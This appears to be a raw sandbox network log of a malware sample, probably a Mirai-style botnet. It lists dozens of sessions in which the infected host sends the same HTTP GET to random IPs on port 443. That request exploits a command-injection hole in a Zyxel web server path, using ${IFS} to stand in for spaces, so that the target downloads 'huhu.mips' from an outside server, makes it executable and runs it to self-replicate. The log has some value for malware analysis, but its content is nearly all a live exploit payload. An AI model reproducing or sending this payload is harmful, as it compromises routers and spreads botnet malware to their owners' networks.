                                              Jan 29, 2024 07:04:10.406435966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9295192.168.2.14506762.23.5.97443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.406456947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9296192.168.2.1439860122.49.48.87443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.406508923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9297192.168.2.1452892182.209.62.100443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.406558990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9298192.168.2.145680019.40.248.200443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.406588078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9299192.168.2.1434224115.50.181.62443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.406644106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9300192.168.2.1440682180.167.168.19443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.406682014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9301192.168.2.1440728208.160.227.186443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.406722069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9302192.168.2.14342764.186.202.183443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.406729937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9303192.168.2.144407880.98.135.165443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.406761885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9304192.168.2.143629495.231.139.180443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.406805038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9305192.168.2.1446398139.81.148.246443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.406836033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9306192.168.2.145261039.18.198.234443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.406877041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9307192.168.2.143763023.13.127.106443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.406914949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9308192.168.2.1460014145.216.219.237443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.406958103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9309192.168.2.145469848.88.202.114443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.406987906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9310192.168.2.143616079.172.98.109443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.407021046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9311192.168.2.1452442158.186.51.79443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.407059908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9312192.168.2.1434604134.56.195.69443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.407126904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9313192.168.2.1460380101.51.182.153443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.407144070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9314192.168.2.143854024.67.52.175443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.407195091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9315192.168.2.1439548154.132.81.43443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.407218933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9316192.168.2.1460808110.117.229.161443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.407248020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9317192.168.2.145064859.61.92.30443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.407300949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9318192.168.2.1440872150.83.113.243443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.407347918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9319192.168.2.1459716130.27.235.135443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.407375097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9320192.168.2.145719863.119.116.104443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.407423973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9321192.168.2.1433582216.121.43.17443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.407454014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9322192.168.2.1452606189.82.207.145443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.407491922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9323192.168.2.14551369.50.165.111443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.407531977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9324192.168.2.1454354206.85.198.188443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.407581091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9325192.168.2.1450446114.127.246.63443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.407615900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9326192.168.2.1449564104.83.28.174443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.407644987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9327192.168.2.144714261.52.181.107443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.407675028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9328192.168.2.1445064103.13.13.222443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.407731056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9329192.168.2.145756291.14.230.94443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.407743931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9330192.168.2.144600818.19.215.52443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.407810926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9331192.168.2.1434388164.94.176.103443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.407829046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9332192.168.2.144395070.63.172.171443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.407866001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9333192.168.2.1449758153.234.31.109443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.407896996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9334192.168.2.144413676.221.229.218443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.407919884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9335192.168.2.1440464128.38.183.86443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.407984972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9336192.168.2.1439782111.61.12.111443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.408031940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9337192.168.2.143897819.77.148.133443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.408081055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9338192.168.2.1434410222.85.136.171443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.408107996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9339192.168.2.1459354168.100.226.0443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.408157110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9340192.168.2.1445200103.110.203.14443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.408184052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9341192.168.2.1459172198.95.176.235443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.408212900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9342192.168.2.145739067.108.233.59443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.408252001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9343192.168.2.1451112211.112.175.79443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.408298016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9344192.168.2.144437899.158.34.144443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.408323050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9345192.168.2.14351021.166.157.214443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.408376932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9346192.168.2.1457908207.63.55.149443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.408405066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9347192.168.2.143838480.179.132.21443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.408459902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9348192.168.2.144129220.124.37.68443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.408500910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9349192.168.2.1458220220.129.217.238443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.408535957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9350192.168.2.1450362169.217.149.210443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.408575058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9351192.168.2.1456096180.236.177.89443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.408612967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9352192.168.2.146010688.94.97.246443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.408672094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9353192.168.2.1451110110.52.115.31443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.408715963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9354192.168.2.1449964119.110.177.245443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.408771992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9355192.168.2.1450510164.213.181.82443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.408813000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9356192.168.2.146070876.97.92.6443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.408849001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9357192.168.2.143603082.80.39.74443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.408905029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9358192.168.2.1438292103.7.39.232443
                                              TimestampBytes transferredDirectionData
